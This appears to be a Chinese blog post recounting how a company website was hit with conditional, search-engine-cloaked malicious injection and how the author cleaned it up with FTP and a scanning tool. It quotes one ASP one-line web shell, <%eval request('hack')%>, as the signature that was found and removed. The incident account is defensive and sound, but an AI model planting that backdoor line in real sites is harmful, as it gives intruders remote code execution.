**
網站被掛馬
青島峯會期間本來想給自己放幾天假的,因爲公司的網站被掛馬給泡湯了,打開公司網站首頁,使用瀏覽器的源代碼功能,發現自己網站的首頁多了很多×××代碼,於是我連接FTP查看網站首頁的代碼中發現了這個掛馬代碼,下面我把代碼貼出來 :
公司網站被掛馬的×××代碼
解釋一下:這個代碼是 PHP的代碼是一種條件性的掛馬,上面的google soso sogou baidu 都是掛馬的條件,意思就是當從 google soso...等等搜索引擎來的訪問客戶會自動在網頁上隱藏一行代碼也就是掛馬代碼。
訪問這個網站的用戶,一般都會被360和百度提示網站有風險和網站掛馬提示的,但是這個掛馬爲什麼不提示呢? 這裏我給大家解密下,不要以爲病毒都會被殺毒軟件殺掉,殺毒軟件也不是萬能的,就像警察抓小偷,警察不知道小偷的特徵怎麼去抓捕呢? 殺毒和這個道理一樣的是根據特徵來的,有一些病毒出來的早,沒有被殺毒跟蹤到,所以360和百度也不會有什麼安全掛馬提示(一般業界人士稱“免殺病毒”)。
說的有點多,言歸正傳。說點乾貨,那遇到這種情況咋辦啊,我的解決辦法就是先查清楚病因後除根,於是用FTP把網站程序全部打包下來然後一個一個文件的檢查,看看有沒有其他名字的文件,我在網上查到一般×××文件名字都是global.asa global.asp 啥的,反正是些不熟悉的文件名,檢查了一下沒有發現特殊的文件名字,於是開始檢查代碼方面,都知道程序員寫代碼能累死,於是用sinesafe的網站掛馬代碼檢查工具,這個工具是專門檢查掛馬代碼的和×××代碼的。我把網站程序的代碼文件放到工具檢測了一下,發現了×××代碼 <%eval request("hack")%> eval的特徵代碼,找到這個代碼後我就給刪除了,重複的用掛馬檢測工具檢查了好幾遍,沒有發現問題後,我這才放心。連接到FTP,把網站程序重新上傳了一遍,網站這才穩定下來。
折騰了我一天,連午睡都沒撈着睡,困死我了。以上就是我網站被掛馬後的解決經歷,希望大家以後遇到這種情況可以自己處理解決。**